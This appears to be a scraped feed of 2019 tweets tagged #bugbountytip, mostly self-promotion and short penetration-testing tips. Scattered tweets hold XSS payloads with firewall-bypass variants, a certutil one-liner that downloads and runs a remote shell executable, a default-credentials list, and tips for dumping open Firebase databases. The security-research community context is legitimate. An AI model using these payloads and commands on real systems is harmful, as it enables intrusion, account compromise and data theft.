€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 17:07:17
0 Million Users PII Leak Data Leak Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/XOMt0BJnnn
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 17:03:30
0 How I could delete Facebook Ask for Recommendations post’s place objects in comments Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/3jmDgBbzsK
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 17:00:08
2 Subdomain Takeover Via Campaignmonitor . Com Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/nmegpRCRSs
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 16:58:31
0 Subdomain Takeover Via https://t.co/CYXQhAOtlh https://t.co/nmegpRCRSs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 16:55:23
0 Disable Any Unconfirmed Account in Facebook https://t.co/p2TQTXMYW5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 16:52:38
0 Prowler: AWS CIS Benchmark Tool https://t.co/TfvuLHUcqN Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/nhF4SN8Sd5 Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 16:48:25
2 Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. https://t.co/ABDslQah52 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #DevOps
Fisher
@Regala_


2019-12-02 16:28:59
2 I did this super tiny extension a while back that you can now find in the BApp Store. Just go to your Site Map -> Select All -> Right click -> Copy sub domains 🙂 #bugbounty #bugbountytip https://t.co/DiwqY76TUk
ghostlulz
@ghostlulz1337


2019-12-02 15:23:47
0 IT'S CYBER MONDAY. If you're looking to make a living doing bug bounties you may want to get a copy of my book. I'll show you exactly how I operate. This is the last time I'll post this 🙂 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #osint #infosec #dfir https://t.co/VZ8FJPVoIO
Dujunayan
@dujunayan


2019-12-02 15:11:29
0 Google it, this's how make shit done <3 #bugbountytip
%00Termi
@Termi1215


2019-12-02 14:26:50
0 Sometimes I just wonder from where @ippsec has got all the knowledge in the world. Oscp, pentesting, bug bounty, red team just watch his videos. @elonmusk of pentesting world. #bugbounty #bugbountytip
ALL ABOUT HACKER
@AboutHacking


2019-12-02 13:21:30
0 How to start Bug Bounty Read -: https://t.co/b9iplwe1i8 #bugbountytip #bugbounty #bugbountytips #cybersecurity https://t.co/tkIgmb7yBH
🇳🇬Sam-Olayemi
@cykic_


2019-12-02 06:58:32
1 XSS cheat sheet contains many vectors that can help you bypass WAFs and filters #CyberSecurity #bugbountytip https://t.co/HfYpEaiOZ6
securibee 🐝
@securibee


2019-12-02 05:26:50
2 Free course "Automate the Boring Stuff with Python Programming" https://t.co/VfpiAK9jgw #bugbountytip #infosec
Sanketh Sharath
@sharathsanketh


2019-12-02 05:03:25
0 I use the community edition of Burp for bug hunting. Its a great tool, but I am really glad I am investing time learning how to use Zap too. This way I could leverage the features I am missing out on the Burp Pro edition. #bugbounty #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-01 22:10:28
6 If you are looking to make đŸ€‘moneyđŸ€‘ as a pentester or bug bounty hunter you will want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED!💰💰 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #infosec #redteam #osint #dfir #pentest https://t.co/gmUrqA1tW7
soon
@soon73564093


2019-12-01 18:20:31
3 Xss Go: https://t.co/hIsozDABTH Paste payload: "><script>alert(document.domain)</script> or "><script>alert(document.cookie)</script> @EBHORSMAN #bugbounty #bugbountytip https://t.co/kOp6LxATOV
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-01 18:09:43
1 Subscribe to Our Telegram Channel and Never miss an update on Zero day and New Bug Bounty Tips and Tricks https://t.co/pfl0JWOIqo Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #pentest
Brijesh Shah
@Brijesh1997


2019-12-01 16:44:37
0 URGENT: Best wordlists for fuzzing subdomains required. Found subdomain/assets/6193029F7C344C93BC50CBDBDC9AC91E.xls Need to find what else is exposed publicly. #bugbounty #bugbountytip #bugbountytips
lordsaibat
@lordsaibat


2019-12-01 13:58:37
1 @RealTryHackMe This is a great start into hacking and bug bounties if you are looking. All the rooms give you clear targets to hunt for. #bugbountytip #Hacking #infosec
Brute Logic
@brutelogic


2019-12-01 13:33:23
3 Old #bugbountytip from 5 years ago! https://t.co/7I6aZ5Fo6v
ninetynine
@ninetyn1ne_


2019-12-01 09:49:33
1 Quick tip - If Cross Origin Request allowed only from https://*.target.com, then try finding an XSS on any subdomain of the target, even if they are out of scope, and initiate a CORS request using that XSS. đŸ€˜đŸ€˜ #bugbountytip #BugBounty
David Dale
@meathacker


2019-12-01 04:01:02
0 Hearing about IDORs? Not sure what they are? https://t.co/3MEbfcCL4j Great resource! #bugbountytip @Bugcrowd @samhouston
Armin Gojak
@fyoozr


2019-11-30 22:52:18
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/A7PsjSLSQQ #bugbounty #bugbountytip
Laszlo Kokai
@kokail


2019-11-30 20:43:11
0 RT @rez0__: Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/76981mCgLk #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Leonishan
@leonishan_


2019-11-30 19:32:04
3 Exploiting XSS with 20 characters limitation #XSS #bypass #bugbountytip #bugbounty https://t.co/k51H9OkNso
Ammar Amer🇾🇟
@cry__pto


2019-11-30 18:03:10
12 -1-Multiple Ways to Get root through Writable File.pdf: https://t.co/442zfZCBtm -2-CTF Series : Vulnerable Machines.pdf: https://t.co/DJMEurYB0d -3-Red Team Tips.pdf: https://t.co/NAJAIeEsK7 #bugbountytip #redteam #PenTest #Hacking #ctf #cybersecurity #infosec #BugBounty #OSINT
Sebastian Wieseler
@kickino


2019-11-30 05:16:25
1 Btw, my slides from my @div0_sg talk about XSS vulnerabilities are here: https://t.co/X968arapPd Enjoy 🙂 #bugbountytip #bugbountytools #bugbounty #togetherwehitharder
𝚛 𝚎 𝚣 đŸ¶
@rez0__


2019-11-30 03:14:29
1 Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/37N78DLalr #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Brijesh Shah
@Brijesh1997


2019-11-29 19:08:04
2 dig A <subdomain> is returning <subdomain> 60 IN SOA https://t.co/SBKgEiAHvQ. https://t.co/UerpKCDxNL 1 7200 900 120960060 Can i takover this subdomain? #bugbounty #bugbountytip #bugbountytips
ALL ABOUT HACKER
@AboutHacking


2019-11-29 18:54:34
0 Cross Site Scripting attack Basic to advance [ part 7]- Basic Burp suite Read:https://t.co/GRACpUbkBi #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/YF94iI795N
Hussein Daher
@HusseiN98D


2019-11-29 18:40:48
0 This was a really hard time for me, I'm back now. Thanks to everyone for your support and all the messages I got. A #bugbountytip will follow soon. Take care
ghostlulz
@ghostlulz1337


2019-11-29 12:55:16
0 Today is BLACK FRIDAY! If you are trying to make a living doing bug bounties you may want to get a copy of my latest book. I show you exactly how I hunt from start to finish. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #BlackFriday2019 #osint #dfir #infosec https://t.co/d1zC3PS0XR
intigriti
@intigriti


2019-11-29 12:38:38
3 đŸ›ïžIt's also #BlackFriday in #BugBounty land 🛒! Harvest all the coupon codes, try this #BugBountyTip by @quintenvi and score some bounties! 💰 https://t.co/mZnQGkOnF3
Arif Khan
@payloadartist


2019-11-29 06:56:15
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/d998DJHlHm #bugbounty #bugbountytip
Ammar Amer🇾🇟
@cry__pto


2019-11-28 23:28:18
7 -Top 40 Best Linux Commands Cheat Sheet. Get It Free Now.pdf: https://t.co/2iKmWinQuN -Complete Google Dorks List in 2019 For Ethical Hacking and Penetration Testing.pdf: https://t.co/hdYVSGNQYs -Blue Team Tips.pdf: https://t.co/lq74aWZo9x #OSINT #bugbountytip #Linux #pentest
bugbountytip
@a_l_e_r_t_1_


2019-11-28 21:05:30
0 Happy Thanksgiving!! Bug bounty tips just 1 $ for 8 hours. Lets go guys. 😂 Lets hacking.. https://t.co/JPaA4CKmfO #bugbountytips #bugbountytip https://t.co/ZEIBuwiUDl
bugbountytip
@a_l_e_r_t_1_


2019-11-28 19:29:47
0 Hi guys. Subscribe my youtube channel for PoC and tutorial videos.. https://t.co/yyqYNBzlhi #Bugbountytips #Bugbountytip
chaitanya
@chaitanya0888


2019-11-28 19:17:14
3 #bugbounty #bugbountytips #bugbountytip đŸ˜‚đŸ˜‚đŸ˜‚đŸ˜‚đŸ˜‚đŸ˜‚đŸ€Ł So, I got 1year free VPN from @wifimask Thanks to wifimask https://t.co/zLrurx34Zm
Pascal S
@PascalSec


2019-11-28 16:58:06
0 #bugbountytip huge productivity boost needed? Go and check out https://t.co/aZfbzgYuLc in case you use Firefox for testing. This eases multiple account / tenant testing by a mile. Shoutout to @infenet, who showed me this add-on in the first place! đŸ„ł
à€ˆà€¶à€Ÿà€š à€žà€żà€‚à€č
@R0X4R


2019-11-28 10:24:17
1 Something interesting for Bug Bounty Hunters. #bugbountytips #bugbounty #bugbountytip #bughunter #hacker #hacking https://t.co/sN4tuXtDce
Random Robbie
@Random_Robbie


2019-11-28 09:25:29
3 #bugbountytip when dealing with ysoserial and windows machines get a shell by doing certutil.exe -urlcache -split -f http://yoursite/shell.exe shell.exe & shell.exe Downloads and renames file and then runs it. save messing with powershell struggles.
Hendrik
@hendrikvb


2019-11-27 21:08:43
1 Grab your #pentesting course fix here during super #blackfriday deal at @PentesterLab #infosec #bugbountytip https://t.co/R2M2j9Q3dO
Elsadat
@M0_SADAT


2019-11-27 19:20:34
3 Today I finished my exams and So excited to find P1 after 2 hours of testing at private program found SQL injection😁and while reporting the issue discovered it's Out of scope subdomain💔 #bugbountytip read the target scope carefully to avoid this kind of heartbreaks #bugbounty
PaweƂ HaƂdrzyƄski
@phaldrzynski


2019-11-27 18:32:50
2 @Hogarth45_ND @plmaltais You can make it even shorter (and get rid of white-space characters): text'/\u0061\u006C\u0065\u0072\u0074`1`// or when slashes are forbidden: text'-\u0061\u006C\u0065\u0072\u0074`1`-' #xss #bugbountytip
Johns
@Johnssimon22


2019-11-27 14:18:10
2 How was i able to access a disabled/hidden feature with the help of burpsuite match and replace feature #bugbountytip #bugbounty https://t.co/q6O93zv2uu
AkaaZaan
@AkaaZaan


2019-11-27 12:07:36
0 infosec people drop links, where I can learn Regex!!! #bugbountytip #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-11-27 11:55:50
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/sGQVdvW3cY
bugbountytip
@a_l_e_r_t_1_


2019-11-27 10:50:40
0 Party Time for laravel 😅 #bugbountytips #bugbountytip https://t.co/mubsogY68J
ghostlulz
@ghostlulz1337


2019-11-27 05:25:02
9 There are tons of tools for horizontal and vertical domain enumeration. I like to use Amass. In my youtube video I explain how to effectively use Amass in your reconnaissance process. https://t.co/ysW9JguyCV #bugbounty #bugbountytip #bugbountytips #infosec #amass #redteam
Ammar Amer🇾🇟
@cry__pto


2019-11-26 23:19:33
5 -subscribe to my youtube channel now -advanced videos tutorials about all hacking fields -parrotsec OS is the OS that gonna be used in the courses -learn ethical hacking in detail. https://t.co/m2akiMCaZI #bugbountytip #redteam #pentest #cybersecurity #malware
bugbountytip
@a_l_e_r_t_1_


2019-11-26 19:03:28
0 Look everywhere. Every user input, every parameter, cookies, headers . You can do it. All you need is patience and more reading.. #bugbountytip #bugbountytips https://t.co/Z49RnHRAxC
Vivek Yadav💙 #Scaffold
@viveky259259


2019-11-26 18:40:26
0 Here's one more bug. This time by Spotify. In #payment section. When I choose #UPI as #payment at that time it should ask me #upi id/pin/address not postal pin. @Spotify @spotifyindia @BugBountyHQ #bugbountytip #bug #music #app #AndroidDev #SpotifyPremium https://t.co/HQ3J1V6mrA
ghostlulz
@ghostlulz1337


2019-11-26 18:21:56
8 Seriously, another unauthenticated database. Google Firebase is a ripe target for getting easy wins, just append "/.json" to the URL and it dumps the entire database. More info on my blog: https://t.co/WGzatNLO3C #BugBounty #bugbountytips #bugbountytip #firebase #infosec
Ananda Dhakal
@dhakal_ananda


2019-11-26 15:36:59
1 Feedback from a private program on @Hacker0x01. They had closed the report as N/A because they did not quite get the report. I made sure to provide all the details clearly once again and it is pending resolution. [1/2] #hackerone #bugbounty #bugbountytip https://t.co/kris0pXagG
Üzeyir đŸ‘šđŸ»â€đŸ’»
@destanuzeyirr


2019-11-26 12:57:15
0 Does anyone know Cookie Based XXE , I may need some help #bugbounty #bugbountytip #togetherwehitharder
Ammar Amer🇾🇟
@cry__pto


2019-11-26 11:28:52
3 -Undetectable C#&C++ Reverse Shells.pdf: https://t.co/08CJhmLAbr -35+ Best Free NMap Tutorials and Courses.pdf: https://t.co/wNd4XNabzv -HTB: Luke.pdf https://t.co/dFYLXTo7zb -How to become a cybersecurity pro.pdf: https://t.co/ODbsUfZpe4 #bugbountytip #hacking #pentest #redteam
Alexander Khovansky
@al_khovansky


2019-11-26 07:50:56
0 *cough* Command-Option-F dangerouslySetInnerHTML *cough* #bugbountytip https://t.co/QScWlAc9Km
tololovejoi
@tolo7010


2019-11-26 00:27:09
2 Your weakness is determined by how do you live with your success. Your strength is determined by how do you handle your difficulties. #motivation #bugbounty #bugbountytip #infosec #hacking #bugbountytips #motivationquotes
Ismayil Tahmazov
@Tismayil1


2019-11-25 21:36:00
0 Sharing is good. Sharing increases happiness. #bugbounty #bugbountytip #bugbountytips #infosec @Nep_1337_1998 https://t.co/VWoZ4xc7cG
Brodie Codie
@brodie_codie


2019-11-25 20:41:20
0 I started doing #bugbounty in Sept, set a goal to reach top 50 in this program... Almost there Tip 2. KEEP READING #movingup #10000Hours #KEEPGOING #perseverance #Bugbountytip #bugbounty @emenalf 👀 https://t.co/YK0XF6uxkb
m0z
@LooseSecurity


2019-11-25 16:42:45
0 Someone just told me they once found company credentials on pastebin. #bugbountytip #bugbounty #bugbountytips #bugbounties #infosec
Security Executions Code
@pwn0sec


2019-11-25 16:35:17
0 Web cache poisoning attack https://t.co/G5ahhQidlh #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
drivertom
@drivertomtt


2019-11-25 16:13:40
0 @Xiaomi #bugbountytips #bugbountytip Never dig ANY vulnerabilities in products that are not admitted by their vendors. https://t.co/MpBnJuVmIh
Security Executions Code
@pwn0sec


2019-11-25 14:46:07
0 Web cache poisoning attack https://t.co/VPiOxCGk3K #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Wh11teW0lf
@Wh11teW0lf


2019-11-25 11:23:55
5 #bugbountytip Default credentials that i always try: admin:admin test:test admin:password admin:pass [email protected]:test [email protected]:test (try with all domains that belong to company) [email protected]:[email protected],com
Security Executions Code
@pwn0sec


2019-11-25 10:50:26
0 Bug Bounty Panasonic : Reflected (XSS) Vulnerability https://t.co/LnMgHCYvxW #bugbounty #bugbountytip #bugbountytips #xss
Pankaj 🇳đŸ‡”đŸ‡źđŸ‡ł đŸ‡·đŸ‡ș
@Nep_1337_1998


2019-11-25 10:47:48
0 Thank you @Tismayil1 for your notes Yes I was awarded with €600. 😍😍 Tools Sub Scanner : https://t.co/hZCWhAbzEm Dir Scanner : https://t.co/9n9y4T5EXE Git Dumper : https://t.co/7z9cdDA26W #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/SLAzoRn8Nz
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 08:13:46
0 Look out the window...if that’s not your dream view...get back to work! #bugbountytip
nutronex
@nutronex


2019-11-25 07:12:48
0 Lfi (cannot use log poison)> download source codes > found database credentials > found hidden admin panel > tried to login admin panel with these credentials > success > file upload > rce #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 06:07:56
0 Cool video about vim 😀 #bugbountytip https://t.co/tBsAbNk3UO
ninetynine
@ninetyn1ne_


2019-11-25 04:43:27
0 Quick tip - If '/something' => 403 Try - '/something/' '/something/%20' '/something.html' '/something.json '/something/?anything' '/something#' Works sometimesđŸ€˜ Happy hacking....!!! #bugbounty #bugbountytip
Mashoud1122
@mashoud1122


2019-11-24 21:42:23
1 I just published my 1st Write UP.Writing it was harder than I thought. here you go: CORS Misconfiguration ->Account TakeOver [Out of scope to grab items In-Scope] #BugBounty #BugBountyTip #BugBountyTips https://t.co/6Ke09g37L5
Nosense
@Nosense08537389


2019-11-24 19:57:15
1 Hello friends! Im trying the exploit 44298 with kernel 4.4.0-87 and ubuntu 16.04.3 but when i run it it provides me invalid argument. May someone can help me what i should do? #bugbounty #hackthebox #PenTest #bountybug #bugbountytip #CyberSecurity #Hacking
đŸ‘»in🐚
@0xerror


2019-11-24 19:09:39
3 XSS News: @spyerror: 'Cloudflare {XSS} «byPass detection» `payloadÂŽ; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/XopkzOyBE8, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-11-24 19:09:39
2 Top story: @spyerror: 'Cloudflare {XSS} «byPass detection» `payloadÂŽ; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/mW90LakWPL, see more https://t.co/fVnXn9Z0FJ
Pratik Yadav
@PratikY9967


2019-11-24 17:31:01
8 Ssti while sending money from one account to another .I inserted a normal payload {{7*7}} in note section. Probably others have missed this bug because no one want to spend small amount for testing . #bugbounty #bugbountytip https://t.co/k4dq1Xa3Tn
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 揰鱹
@spyerror


2019-11-24 13:24:05
6 Cloudflare {XSS} «byPass detection» `payloadÂŽ; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec https://t.co/oHTNwiv6Au
ghostlulz
@ghostlulz1337


2019-11-24 13:21:21
9 If you're wanting to become a full time bug bounty hunter or penetration tester you may want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytip #infosec #appsec #redteam #PenTest #DFIR #OSINT #xss https://t.co/iBiJBKWwPU
vinod3070
@vinod3070


2019-11-24 11:37:41
0 It's a project management tool, if I put my vps link in the group chat box I get GET req to my VPS. Nothing else is working. Any leads ? #bugbountytips #bugbountytip #hackerone #recon #ssrf
luis madero
@_Y000_


2019-11-24 00:27:50
3 Explotando vulnerabilidad CORS.(cross origin resource sharing) #hacked #cors #bugbountytip #bugbounty #CyberSecurity https://t.co/vWzRICB3T1
Shammah Agwor
@Zealsham


2019-11-23 23:01:26
0 Search shodan for “aquatone_report.html” get access to dozen of recon data from other bug hunters 😂😂. #Bugbountytip #bugbounty
Halil AHMAD
@Halilahmadd


2019-11-23 21:39:11
4 Cloudflare Bypass Payload:<svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security @XssPayloads
healthyoutlet
@healthyoutlet


2019-11-23 20:49:38
0 Get all the urls out of a sitemap.xml with curl and xmllint in a bash oneliner. curl -s https://t.co/A6bYnXdhNI | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' #bugbountytip
ticarpi
@ticarpi


2019-11-23 20:40:15
3 jwt_tool v1.3.2 now has improved 'Spoof JWKS' functionality https://t.co/yA6KVOSEqO #jwt #jwks #bugbountytip #netsec https://t.co/uH8H4LwB9J
Pavandeep
@Pavandep8


2019-11-23 15:43:20
0 Look what I shared: SQL Injection Step By Step Part 1 - Nilesh Sanyal - Medium @MIUI| #bugbountytip #Hacker #security https://t.co/deek38JH50
Nick || hunt4p1zza
@ngkogkos


2019-11-23 15:08:38
6 Burp has many features to help your workflow & better -> more bugs. In my @Burp_Suite proxy, I constantly use a search regex pattern that includes standard placeholders I use within my payloads, such as zzz/xss, and I keep adding to it. #burpsuitetip #bugbountytip #BugBounty https://t.co/3CHDtFGQeF
Paresh
@Paresh_parmar1


2019-11-23 10:10:04
8 #bugbountytip decompile android app. and go to : Resources > resources.arsc > res > values > strings.xml search for *.firebaseio.com in xml file. ,and open browser try https://*.firebaseio.com/.json , you might find read access to database there. #bugbountytips . https://t.co/eZPSqnAbWV
ninetynine
@ninetyn1ne_


2019-11-23 08:24:59
0 XSS tip - when looking for XSS, try functions like - 'confirm()' and 'eval()' instead of 'alert()' & 'prompt()' to bypass the WAF. 🧐 #bugbountytip #BugBounty
ghostlulz
@ghostlulz1337


2019-11-23 07:08:39
9 Expanding your scope on a bug bounty program is a great way to gain more vulnerabilities.Horizontal domain enumeration is a technique used to find domains of an organization. More information on my youtube video: https://t.co/nrVeAWSmxV #bugbountytip #BugBounty #bugbountytips
HackIsOn Âź
@hackison


2019-11-23 04:44:08
13 Everytime shodan gives a surprise to our #cybersecurity community 😎😎 Utilise it everyone đŸ€— #BugBounty #bugbountytip #bugbountytips #hacking #cybersecurity #linux #Ubuntu #hacking #hackers #owasp #bug #vulnerability #redteam #redteaming https://t.co/XAYGEChP7d
Ammar Amer🇾🇟
@cry__pto


2019-11-22 19:13:56
15 -Web Application Penetration Testing Course.pdf: https://t.co/GlebM7I7b0 -20 Best HTML Cheat Sheet Of 2019 | With All New HTML5 Tags.pdf: https://t.co/59tuOLtNSb -Fasten your Recon process using Shell Scripting.pdf: https://t.co/33JZAQ2k4n #html #Hacking #bugbountytip #PenTest
healthyoutlet
@healthyoutlet


2019-11-22 18:41:00
0 1) Find as many domains as you can that are owned by the target org: https://t.co/sTkppJra4w 2) run subdomain discovery on all of them 3) make a wordlist of all discovered subdomains 4) run massdns on in scope domains with that wordlist. #bugbountytip
florens
@florens25301329


2019-11-22 17:27:55
0 Need some help to exploit DOM-XSS will share bounty! #BugBounty #bugbountytip #togetherwehitharder
Yash sariya
@stylish_hacker_


2019-11-22 08:33:44
0 How to become a successful bug hunter https://t.co/nYs8qifcA0 #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:32:27
0 What is web server fingerprint https://t.co/BdmKPXFPpd #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:26:59
0 Complete Recon Process A to z https://t.co/msMzOd0Ja7 #bugbountytip #bugbounty #bugbountytips
Udit Bhadauria
@udit_thakkur


2019-11-22 06:59:54
0 @NahamSec just uploaded his talk at @defcon "Owning The Clout Through SSRF" with @daeken! https://t.co/jb7XuGIXyN The pdf can be found: https://t.co/R7gbIXgItf & if you want to practice it, consider looking into @PentesterLab's exercise of brown badge. #infosec #bugbountytip
Brodie Codie
@brodie_codie


2019-11-22 05:04:54
0 so aquatone has it's own probe to check if links are alive with this option found 2 admin panes this way "cat List.txt| aquatone -ports xlarge" #bugbountytips #bugbountytip
Securisec 🚀
@securisec


2019-11-22 01:33:31
0 "RT RT Tismayil1: Yes I earned $3180. Tools : Sub Scanner : https://t.co/VcdATHEpOs Dir Scanner : https://t.co/HJAwQE187M Git Dumper : https://t.co/ZKqKYdHhkG #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/UGa0yAvGEx"
healthyoutlet
@healthyoutlet


2019-11-21 23:14:43
0 #bugbountytip keep your hackerone inbox open so that it's super easy to check for updates on that crit every 15 minutes for the next week. Bonus tip: Have a pint of ben and jerry's ready for when it gets marked dupe.
Binit Ghimire
@WHOISbinit


2019-11-21 19:51:51
1 When you are using a XSS payload in email field during registration and it doesn't execute after creating the account, try choosing the "Resend Activation Email" option. Developers are likely to forget filtering the email in activation email resent message. #XSS #BugBountyTip
Ismayil Tahmazov
@Tismayil1


2019-11-21 19:03:42
18 Yes I earned $3180. Tools : Sub Scanner : https://t.co/LegySAU3sZ Dir Scanner : https://t.co/1L6MutcaEc Git Dumper : https://t.co/IOsHlTWCP2 #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/6Qy1JEiDWM
Vikash Chaudhary
@OffensiveHunter


2019-11-21 05:31:42
2 #BugBountyTip completes the first checklist that I gave it to you yesterday, now move to on these vulnerabilities spend some time to read about these topics. if you want to learn live bug bounty hunting you can subscribe to my second course i.e Offensive
https://t.co/ji3V0Sxi5a
Mourad
@SecuAudit


2019-11-20 22:27:32
0 The worst Bug Bounty program : You spend your holidays trying to help them to secure their online business . after 45days when you ask for an update they just get worse and treat you like shit in return ,Bug Hunters have no value in this chain #bugbountytip #BugBounty #pentesting
florens
@florens25301329


2019-11-20 20:18:04
2 Finally got the last bit working so i can finish the practical for XXE!! Notes will be available today/tomorrow! #bugbountytip #Bugbounty
itsmenaga
@nagarockshard


2019-11-20 17:17:24
0 After seeing *.domain.com ...Recon Script Pop-ups 😛😂 #BadBugBountyPickUpLines #bugbountytip
Yadhavi
@PrincessYadhavi


2019-11-20 16:57:27
0 As Defcon 27 videos uploaded to youtube, which talks are must watch for bug bounty hunters? #defcon #bugbounty #bugbountytip #bugbountytips
Ali TĂŒtĂŒncĂŒ
@alicanact60


2019-11-20 16:27:34
0 Hi there! I will share a vulnerability which I found on Facebook. PoC video or Write up? Which one do you prefer? The survey will be available for 2 days and then, I will publish it. Select one! #BugBounty #bugbountytips #bugbountytip
Daher Mohamed
@DaherMohamed4


2019-11-20 15:37:46
0 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/uv11CIACuA #BugBounty #bugbountytips #bugbountytip
RIPS Technologies
@ripstech


2019-11-20 15:36:25
2 Find out how Simon found 5 #WordPress core 0days, in our #security whitepaper: ->https://t.co/U7VCsBglqR #bugbounty #bugbountytip #bugbountytips #AppSec https://t.co/fNU3DID063
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-20 13:18:12
0 Get Cyber Security and Technology Internship with HACKDOOR Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/KskyHzVwvW
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-20 13:10:22
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/u2LdRIokeL
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-20 13:08:49
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Bh0bARIGBh
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-20 13:06:58
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mCZqeZB8YT
National Cyber Security Services
@NationalCyberS1


2019-11-20 12:40:53
